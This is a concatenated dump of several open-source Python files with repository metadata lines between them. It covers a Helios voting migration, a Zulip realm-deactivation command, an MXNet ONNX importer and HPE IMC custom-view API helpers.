'voting_started_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'voting_starts_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'})
},
'helios.electionlog': {
'Meta': {'object_name': 'ElectionLog'},
'at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'election': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['helios.Election']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'log': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'helios.trustee': {
'Meta': {'object_name': 'Trustee'},
'decryption_factors': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'decryption_proofs': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'election': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['helios.Election']"}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'pok': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'public_key': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'public_key_hash': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'secret': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'secret_key': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'helios.voter': {
'Meta': {'unique_together': "(('election', 'voter_login_id'),)", 'object_name': 'Voter'},
'alias': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'cast_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'election': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['helios.Election']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['helios_auth.User']", 'null': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'vote': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'vote_hash': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'voter_email': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'voter_login_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'voter_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'voter_password': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'})
},
'helios.voterfile': {
'Meta': {'object_name': 'VoterFile'},
'election': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['helios.Election']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'num_voters': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'processing_finished_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'processing_started_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'voter_file': ('django.db.models.fields.files.FileField', [], {'max_length': '250', 'null': 'True'}),
'voter_file_content': ('django.db.models.fields.TextField', [], {'null': 'True'})
}
}
complete_apps = ['helios']
| dmgawel/helios-server | helios/south_migrations/0007_auto__add_field_voterfile_voter_file_content__chg_field_voterfile_vote.py | Python | apache-2.0 | 11,336 |
# coding=utf-8
# Copyright 2016 The TF-Slim Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
| google-research/tf-slim | tf_slim/training/__init__.py | Python | apache-2.0 | 701 |
from __future__ import absolute_import
from __future__ import print_function
from django.core.management.base import BaseCommand
import sys
from zerver.lib.actions import do_deactivate_realm
from zerver.models import get_realm
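# Typical invocation via Django's management interface (hypothetical domain):
#     ./manage.py deactivate_realm example.com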
class Command(BaseCommand):
help = """Script to deactivate a realm."""
def add_arguments(self, parser):
parser.add_argument('domain', metavar='<domain>', type=str,
help='domain of realm to deactivate')
def handle(self, *args, **options):
realm = get_realm(options["domain"])
if realm is None:
print("Could not find realm %s" % (options["domain"],))
sys.exit(1)
print("Deactivating", options["domain"])
do_deactivate_realm(realm)
print("Done!")
| dwrpayne/zulip | zerver/management/commands/deactivate_realm.py | Python | apache-2.0 | 789 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=invalid-name,too-many-locals,no-self-use
""" Support import export formats."""
from __future__ import absolute_import as _abs
from .... import symbol
from .... import ndarray as nd
from ....base import string_types
from .import_helper import _convert_map as convert_map
class GraphProto(object): # pylint: disable=too-few-public-methods
"""A helper class for handling mxnet symbol copying from pb2.GraphProto.
Definition: https://github.com/onnx/onnx/blob/master/onnx/onnx.proto
"""
def __init__(self):
self._nodes = {}
self._params = {}
self._num_input = 0
self._num_param = 0
def _convert_operator(self, node_name, op_name, attrs, inputs):
"""Convert from onnx operator to mxnet operator.
        The converter must specify conversions explicitly for incompatible names, and
apply handlers to operator attributes.
Parameters
----------
:param node_name : str
name of the node to be translated.
:param op_name : str
Operator name, such as Convolution, FullyConnected
:param attrs : dict
Dict of operator attributes
:param inputs: list
list of inputs to the operator
Returns
-------
:return mxnet_sym
Converted mxnet symbol
"""
if op_name in convert_map:
op_name, new_attrs, inputs = convert_map[op_name](attrs, inputs, self)
else:
raise NotImplementedError("Operator {} not implemented.".format(op_name))
if isinstance(op_name, string_types):
new_op = getattr(symbol, op_name, None)
if not new_op:
raise RuntimeError("Unable to map op_name {} to sym".format(op_name))
if node_name is None:
mxnet_sym = new_op(*inputs, **new_attrs)
else:
mxnet_sym = new_op(name=node_name, *inputs, **new_attrs)
return mxnet_sym
return op_name
def from_onnx(self, graph):
"""Construct symbol from onnx graph.
Parameters
----------
graph : onnx protobuf object
The loaded onnx graph
Returns
-------
sym :symbol.Symbol
The returned mxnet symbol
params : dict
A dict of name: nd.array pairs, used as pretrained weights
"""
# parse network inputs, aka parameters
for init_tensor in graph.initializer:
if not init_tensor.name.strip():
raise ValueError("Tensor's name is required.")
self._params[init_tensor.name] = self._parse_array(init_tensor)
# converting GraphProto message
for i in graph.input:
if i.name in self._params:
# i is a param instead of input
self._nodes[i.name] = symbol.Variable(name=i.name,
shape=self._params[i.name].shape)
else:
self._nodes[i.name] = symbol.Variable(name=i.name)
# For storing arg and aux params for the graph.
auxDict = {}
argDict = {}
# constructing nodes, nodes are stored as directed acyclic graph
# converting NodeProto message
for node in graph.node:
op_name = node.op_type
node_name = node.name.strip()
node_name = node_name if node_name else None
onnx_attr = self._parse_attr(node.attribute)
inputs = [self._nodes[i] for i in node.input]
mxnet_sym = self._convert_operator(node_name, op_name, onnx_attr, inputs)
for k, i in zip(list(node.output), range(len(mxnet_sym.list_outputs()))):
self._nodes[k] = mxnet_sym[i]
# splitting params into args and aux params
for args in mxnet_sym.list_arguments():
if args in self._params:
argDict.update({args: nd.array(self._params[args])})
for aux in mxnet_sym.list_auxiliary_states():
if aux in self._params:
auxDict.update({aux: nd.array(self._params[aux])})
# now return the outputs
out = [self._nodes[i.name] for i in graph.output]
if len(out) > 1:
out = symbol.Group(out)
else:
out = out[0]
return out, argDict, auxDict
def _parse_array(self, tensor_proto):
"""Grab data in TensorProto and convert to numpy array."""
try:
from onnx.numpy_helper import to_array
except ImportError:
raise ImportError("Onnx and protobuf need to be installed. "
+ "Instructions to install - https://github.com/onnx/onnx")
np_array = to_array(tensor_proto).reshape(tuple(tensor_proto.dims))
return nd.array(np_array)
def _parse_attr(self, attr_proto):
"""Convert a list of AttributeProto to a dict, with names as keys."""
attrs = {}
for a in attr_proto:
for f in ['f', 'i', 's']:
if a.HasField(f):
attrs[a.name] = getattr(a, f)
# Needed for supporting python version > 3.5
if isinstance(attrs[a.name], bytes):
attrs[a.name] = attrs[a.name].decode(encoding='utf-8')
for f in ['floats', 'ints', 'strings']:
if list(getattr(a, f)):
assert a.name not in attrs, "Only one type of attr is allowed"
attrs[a.name] = tuple(getattr(a, f))
for f in ['t', 'g']:
if a.HasField(f):
attrs[a.name] = getattr(a, f)
for f in ['tensors', 'graphs']:
if list(getattr(a, f)):
raise NotImplementedError("Filed {} is not supported in mxnet.".format(f))
if a.name not in attrs:
raise ValueError("Cannot parse attribute: \n{}\n.".format(a))
return attrs
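
# A minimal usage sketch (illustrative only -- this module uses relative
# imports, so drive it from client code rather than running it directly).
# The 'model.onnx' path is hypothetical and the `onnx` package is assumed
# to be installed:
#
#     import onnx
#     from mxnet.contrib.onnx._import.import_onnx import GraphProto
#     model_proto = onnx.load('model.onnx')
#     sym, arg_params, aux_params = GraphProto().from_onnx(model_proto.graph)
#     print(sym.list_outputs())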
| TuSimple/mxnet | python/mxnet/contrib/onnx/_import/import_onnx.py | Python | apache-2.0 | 6,849 |
#!/usr/bin/env python3
# author: @netmanchris
# This section imports required libraries
import requests
import json
from pyhpeimc.plat.device import *
HEADERS = {'Accept': 'application/json', 'Content-Type': 'application/json',
           'Accept-encoding': 'application/json'}
"""
This section deals with HPE IMC Custom View functions
"""
def get_custom_views(auth: object, url: object, name: object = None, headers: object = HEADERS) -> object:
"""
    function takes auth and url and returns a list of dictionaries of custom views from an HPE IMC. Optional name
    argument will return only the specified view.
    :param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
    :param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
    :param name: (optional) str containing the name of the desired custom view
    :return: list of dictionaries containing attributes of the custom views
    :rtype: list
>>> from pyhpeimc.auth import *
>>> from pyhpeimc.plat.groups import *
>>> auth = IMCAuth("http://", "10.101.0.203", "8080", "admin", "admin")
>>> all_views = get_custom_views(auth.creds, auth.url)
>>> assert type(all_views) is list
>>> assert 'name' in all_views[0]
>>> non_existant_view = get_custom_views(auth.creds, auth.url, name = '''Doesn't Exist''')
>>> assert non_existant_view == None
"""
if name is None:
get_custom_view_url = '/imcrs/plat/res/view/custom?resPrivilegeFilter=false&desc=false&total=false'
elif name is not None:
get_custom_view_url = '/imcrs/plat/res/view/custom?resPrivilegeFilter=false&name='+name+'&desc=false&total=false'
f_url = url + get_custom_view_url
r = requests.get(f_url, auth=auth, headers=headers)
try:
if r.status_code == 200:
custom_view_list = (json.loads(r.text))
if 'customView' in custom_view_list:
custom_view_list = custom_view_list['customView']
if type(custom_view_list) == dict:
custom_view_list = [custom_view_list]
return custom_view_list
else:
return custom_view_list
except requests.exceptions.RequestException as e:
return "Error:\n" + str(e) + ' get_custom_views: An Error has occured'
def get_custom_view_details(name, auth, url):
"""
    function takes the name of a custom view plus auth and url, and returns a list of dictionaries describing the
    devices contained in that custom view on an HPE IMC.
    :param name: str containing the name of the desired custom view
    :param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
    :param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
    :return: list of dictionaries containing attributes of the devices in the custom view
    :rtype: list
>>> from pyhpeimc.auth import *
>>> from pyhpeimc.plat.groups import *
>>> auth = IMCAuth("http://", "10.101.0.203", "8080", "admin", "admin")
>>> view_details = get_custom_view_details('My Network View', auth.creds, auth.url)
>>> assert type(view_details) is list
>>> assert 'label' in view_details[0]
"""
view_id = get_custom_views(auth, url, name=name)[0]['symbolId']
get_custom_view_details_url = '/imcrs/plat/res/view/custom/' + str(view_id)
f_url = url + get_custom_view_details_url
r = requests.get(f_url, auth=auth,
headers=HEADERS) # creates the URL using the payload variable as the contents
try:
if r.status_code == 200:
current_devices = (json.loads(r.text))
if 'device' in current_devices:
return current_devices['device']
else:
return []
except requests.exceptions.RequestException as e:
return "Error:\n" + str(e) + ' get_custom_views: An Error has occured'
def create_custom_views(auth, url,name=None, upperview=None):
"""
    function takes a view name (and an optional upperview parent name) and issues a RESTFUL call to create the
    custom view on HPE IMC. If upperview is supplied, the new view is nested under that parent view.
    :param name: string containing the name of the desired custom view
    :param upperview: (optional) string containing the name of the parent custom view
    :param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
    :param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
    :return: str of creation results ("View " + name + " created successfully")
    :rtype: str
>>> from pyhpeimc.auth import *
>>> from pyhpeimc.plat.groups import *
>>> auth = IMCAuth("http://", "10.101.0.203", "8080", "admin", "admin")
#Create L1 custom view
>>> create_custom_views(auth.creds, auth.url, name='L1 View')
'View L1 View created successfully'
>>> view_1 =get_custom_views( auth.creds, auth.url, name = 'L1 View')
>>> assert type(view_1) is list
>>> assert view_1[0]['name'] == 'L1 View'
    #Create nested custom view
>>> create_custom_views(auth.creds, auth.url, name='L2 View', upperview='L1 View')
'View L2 View created successfully'
>>> view_2 = get_custom_views( auth.creds, auth.url, name = 'L2 View')
>>> assert type(view_2) is list
>>> assert view_2[0]['name'] == 'L2 View'
"""
create_custom_views_url = '/imcrs/plat/res/view/custom?resPrivilegeFilter=false&desc=false&total=false'
f_url = url + create_custom_views_url
if upperview is None:
payload = '''{ "name": "''' + name + '''",
"upLevelSymbolId" : ""}'''
#print (payload)
else:
parentviewid = get_custom_views(auth, url, upperview)[0]['symbolId']
payload = '''{ "name": "'''+name+ '''",
"upLevelSymbolId" : "'''+str(parentviewid)+'''"}'''
#print (payload)
r = requests.post(f_url, data = payload, auth=auth, headers=HEADERS) # creates the URL using the payload variable as the contents
try:
if r.status_code == 201:
return 'View ' + name +' created successfully'
except requests.exceptions.RequestException as e:
return "Error:\n" + str(e) + ' get_custom_views: An Error has occured'
#TODO Need to add tests and examples for add_devs_custom_views
def add_devs_custom_views(custom_view_name, dev_list, auth, url):
"""
    function takes the name of a custom view and a list of devIDs from devices discovered in the HPE IMC platform,
    and issues a RESTFUL call to add those devices to the specified custom view on HPE IMC.
    :param custom_view_name: str containing the name of the target custom view
    :param dev_list: list containing the devID of all devices to be contained in this custom view.
:param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
:param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
:return: str of creation results ( "view " + name + "created successfully"
:rtype: str
>>> from pyhpeimc.auth import *
>>> from pyhpeimc.plat.groups import *
>>> auth = IMCAuth("http://", "10.101.0.203", "8080", "admin", "admin")
"""
view_id = get_custom_views(auth, url, name=custom_view_name)[0]['symbolId']
add_devs_custom_views_url = '/imcrs/plat/res/view/custom/'+str(view_id)
payload = '''{"device" : '''+ json.dumps(dev_list) + '''}'''
f_url = url + add_devs_custom_views_url
r = requests.put(f_url, data = payload, auth=auth, headers=HEADERS) # creates the URL using the payload variable as the contents
try:
if r.status_code == 204:
print ('View ' + custom_view_name +' : Devices Successfully Added')
return r.status_code
except requests.exceptions.RequestException as e:
return "Error:\n" + str(e) + ' get_custom_views: An Error has occured'
def delete_custom_view(auth, url, name):
"""
    function takes input of auth, url, and name and issues a RESTFUL call to delete a specific custom view from HPE
    IMC.
    :param name: string containing the name of the custom view to delete
    :param auth: requests auth object #usually auth.creds from auth pyhpeimc.auth.class
    :param url: base url of IMC RS interface #usually auth.url from pyhpeimc.auth.authclass
    :return: str of deletion results ("View " + name + " deleted successfully")
    :rtype: str
>>> from pyhpeimc.auth import *
>>> from pyhpeimc.plat.groups import *
>>> auth = IMCAuth("http://", "10.101.0.203", "8080", "admin", "admin")
>>> delete_custom_view(auth.creds, auth.url, name = "L1 View")
'View L1 View deleted successfully'
>>> view_1 =get_custom_views( auth.creds, auth.url, name = 'L1 View')
>>> assert view_1 == None
>>> delete_custom_view(auth.creds, auth.url, name = "L2 View")
'View L2 View deleted successfully'
>>> view_2 =get_custom_views( auth.creds, auth.url, name = 'L2 View')
>>> assert view_2 == None
"""
view_id = get_custom_views(auth, url,name )[0]['symbolId']
delete_custom_view_url = '/imcrs/plat/res/view/custom/'+str(view_id)
f_url = url + delete_custom_view_url
r = requests.delete(f_url, auth=auth, headers=HEADERS) # creates the URL using the payload variable as the contents
try:
if r.status_code == 204:
return 'View ' + name +' deleted successfully'
except requests.exceptions.RequestException as e:
return "Error:\n" + str(e) + ' delete_custom_view: An Error has occured' | HPNetworking/HP-Intelligent-Management-Center | build/lib/pyhpeimc/plat/groups.py | Python | apache-2.0 | 9,544 |